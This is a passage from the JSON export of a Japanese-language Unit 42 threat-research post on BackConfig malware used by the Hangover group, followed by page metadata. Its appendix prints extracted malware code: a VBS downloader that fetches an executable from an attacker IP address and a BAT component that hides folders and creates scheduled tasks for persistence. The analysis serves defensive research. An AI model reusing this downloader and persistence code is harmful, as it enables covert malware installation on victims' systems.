1\/1\/2025<\/li>\n<\/ul>\n<h5><strong>NVIDIA:<\/strong><\/h5>\n<ul>\n<li>thumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3<\/li>\n<li>issuer: CN=NVIDIA Corporation<\/li>\n<li>subject: CN=NVIDIA Corporation<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1<\/li>\n<li>valid from: 1\/1\/2019<\/li>\n<li>valid to: 1\/1\/2025<\/li>\n<\/ul>\n<h3><a id=\"post-107263-appendix\"><\/a>\u4ed8\u9332<\/h3>\n<p>\u4ee5\u4e0b\u306eVBS\u30b3\u30fc\u30c9\u3068BAT\u30b3\u30fc\u30c9\u306f\u3001XLS\u30b5\u30f3\u30d7\u30eb(SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83)\u304b\u3089\u62bd\u51fa\u3055\u308c\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n<h4>VBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<br \/>\n<span style=\"font-size: 10pt;\">(SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)<\/span><\/h4>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">[Drive.txt -&gt; Drive.vbs CODE]<\/span><\/p>\n<pre class=\"lang:default decode:true\">strFileURL = \"http:\/\/<strong>185.203.119[.]184\/Dropbox\/request\"<\/strong> \r\nSet oShell = CreateObject(\"WScript.Shell\") \r\n     strHomeFolder = \r\noShell.ExpandEnvironmentStrings(\"%USERPROFILE%\") \r\n     strPath = \"<strong>C:\\Drivers\\dphc.exe\"<\/strong> \r\nOn Error Resume Next \r\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") \r\n    objXMLHTTP.open \"GET\", strFileURL, false \r\n    objXMLHTTP.send() \r\nIf objXMLHTTP.Status = 200 Then \r\nSet objADOStream = CreateObject(\"ADODB.Stream\") \r\nobjADOStream.Open \r\nobjADOStream.Type = 1  \r\nobjADOStream.Write objXMLHTTP.ResponseBody \r\nobjADOStream.Position = 0     \r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\nIf objFSO.Fileexists(strPath) Then WScript.Quit() \r\nSet objFSO = Nothing \r\nobjADOStream.SaveToFile strPath \r\nobjADOStream.Close \r\nSet objADOStream = Nothing \r\nEnd if \r\nSet objXMLHTTP = Nothing  \r\n<\/pre>\n<h4>\u300cSetup\u300dBAT\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<\/h4>\n<p>[Audio.txt -&gt; Audio.bat CODE]<\/p>\n<pre class=\"lang:default decode:true\">Set oFile = fso.CreateTextFile(\"c:\\Drivers\\Audio.txt\")\r\noFile.WriteLine (\"echo off\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\pdf\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\dwg\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Daily\\Backup\\Files\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Adobe\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Daily\")\r\noFile.WriteLine (\"attrib +a +h +s C:\\Drivers\")\r\noFile.WriteLine (\"del \/f \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"del \/f \r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\"\r\noFile.WriteLine (\"SET \/A %COMPUTERNAME%\")\r\noFile.WriteLine (\"SET \/A RAND=%RANDOM% 10000 + 1\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% &gt;&gt; \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% &gt;&gt; \r\n<strong>%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\")<\/strong>\r\noFile.WriteLine (\"schtasks \/delete \/tn Winmgt_log \/f\")\r\noFile.WriteLine (\"schtasks \/delete \/tn Yahoo_Drive \/f\")\r\noFile.WriteLine (\"schtasks \/create \/sc minute \/mo 10 \/f \/tn \r\nWinmgt_log \/tr C:\\Drivers\\dphc.exe\")\r\noFile.WriteLine (\"schtasks \/create \/sc minute \/mo 20 \/f \/tn \r\nYahoo_Drive \/tr C:\\Drivers\\Drive.vbs\")\r\noFile.WriteLine (\"ren C:\\Drivers\\Drive.txt Drive.vbs \")\r\noFile.WriteLine (\"del %0\")\r\noFile.Close\r\nSet fso = Nothing\r\nSet oFile = Nothing\r\n\r\n    Dim OldName, NewName\r\n    GivenLocation = \"C:\\Drivers\\\"\r\n    OldName = \"Audio.txt\"\r\n    <strong>NewName = \"Audio.bat\"<\/strong>\r\n    On Error Resume Next\r\n    Name GivenLocation &amp; OldName As GivenLocation &amp; NewName\r\n    Dim RetVal\r\n    RetVal = Shell(\"C:\\Drivers\\Audio.bat\", vbHide)\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 Unit 42\u306f\u3001Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d\u3001Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u3001\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u3063\u3066\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u73fe<\/p>\n","protected":false},"author":46,"featured_media":101175,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[6305,6328,4587],"product_categories":[4346,4442,4443,4444,4448],"coauthors":[635,935],"class_list":["post-107263","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-backconfig-ja","tag-hangover-threat-group","tag-spear-phishing-ja","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cortex-xdr-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2<\/title>\n<meta name=\"description\" content=\"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\" \/>\n<meta property=\"og:description\" content=\"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-15T06:40:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-15T06:41:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"2001\" \/>\n\t<meta property=\"og:image:height\" content=\"1001\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Alex Hinchliffe, Robert Falcone\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","og_locale":"ja_JP","og_type":"article","og_title":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","og_description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","og_site_name":"Unit 42","article_published_time":"2020-05-15T06:40:12+00:00","article_modified_time":"2020-05-15T06:41:33+00:00","og_image":[{"width":2001,"height":1001,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","type":"image\/png"}],"author":"Alex Hinchliffe, Robert Falcone","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"},"author":{"name":"Alex Hinchliffe","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"headline":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","datePublished":"2020-05-15T06:40:12+00:00","dateModified":"2020-05-15T06:41:33+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"},"wordCount":10985,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","keywords":["BackConfig","Hangover Threat Group","Spear Phishing"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","name":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","datePublished":"2020-05-15T06:40:12+00:00","dateModified":"2020-05-15T06:41:33+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","width":2001,"height":1001},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f","name":"Alex Hinchliffe","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Alex Hinchliffe"},"url":"https:\/\/unit42.paloaltonetworks.com\/ja\/author\/alex-hinchliffe\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/46"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=107263"}],"version-history":[{"count":7,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263\/revisions"}],"predecessor-version":[{"id":107294,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263\/revisions\/107294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/101175"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=107263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=107263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=107263"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=107263"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=107263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}